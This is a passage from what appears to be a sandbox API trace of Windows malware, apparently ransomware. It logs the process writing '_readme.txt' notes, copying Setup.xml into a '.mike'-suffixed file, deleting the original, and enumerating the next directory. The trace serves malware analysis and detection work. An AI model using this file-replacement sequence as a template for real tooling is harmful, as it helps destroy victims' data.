Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.402] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.402] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0041.402] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.402] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.402] GetFileType (hFile=0x264) returned 0x1 [0041.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.402] GetFileType (hFile=0x264) returned 0x1 [0041.403] WriteFile (in: hFile=0x264, lpBuffer=0x2160800*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2160800*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.403] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.404] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.404] GetFileType (hFile=0x264) returned 0x1 [0041.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.404] GetFileType (hFile=0x264) returned 0x1 [0041.404] CloseHandle (hObject=0x264) returned 1 [0041.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.404] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.404] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.404] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.404] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21627d4 | out: lpFileInformation=0x21627d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0041.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.405] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.417] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2162af0 | out: lpFileInformation=0x2162af0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0041.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.417] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.418] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.418] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.418] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.418] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.419] GetFileType (hFile=0x264) returned 0x1 [0041.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.419] GetFileType (hFile=0x264) returned 0x1 [0041.419] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.419] WriteFile (in: hFile=0x264, lpBuffer=0x216396c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x216396c*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.420] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2163474 | out: lpFileInformation=0x2163474*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0041.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.420] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.420] GetFileType (hFile=0x264) returned 0x1 [0041.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.420] GetFileType (hFile=0x264) returned 0x1 [0041.420] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.420] ReadFile (in: hFile=0x264, lpBuffer=0x2164a94, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2164a94*, lpNumberOfBytesRead=0x2af110*=0xa40, lpOverlapped=0x0) returned 1 [0041.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.423] GetFileType (hFile=0x264) returned 0x1 [0041.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.423] GetFileType (hFile=0x264) returned 0x1 [0041.423] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.423] WriteFile (in: hFile=0x264, lpBuffer=0x216a238*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x216a238*, lpNumberOfBytesWritten=0x2af104*=0xa40, lpOverlapped=0x0) returned 1 [0041.423] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.423] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.424] GetFileType (hFile=0x264) returned 0x1 [0041.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.424] GetFileType (hFile=0x264) returned 0x1 [0041.424] WriteFile (in: hFile=0x264, lpBuffer=0x216d460*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x216d460*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.425] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e32140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e32140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0041.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.425] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x216ebdc | out: lpFileInformation=0x216ebdc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e32140, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e32140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc60)) returned 1 [0041.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.425] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0041.425] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.426] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0041.426] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.426] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.427] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.427] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.427] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.427] GetFileType (hFile=0x264) returned 0x1 [0041.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.427] GetFileType (hFile=0x264) returned 0x1 [0041.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.428] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.428] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.428] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2e32140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.429] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2e32140, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e582a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.429] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, 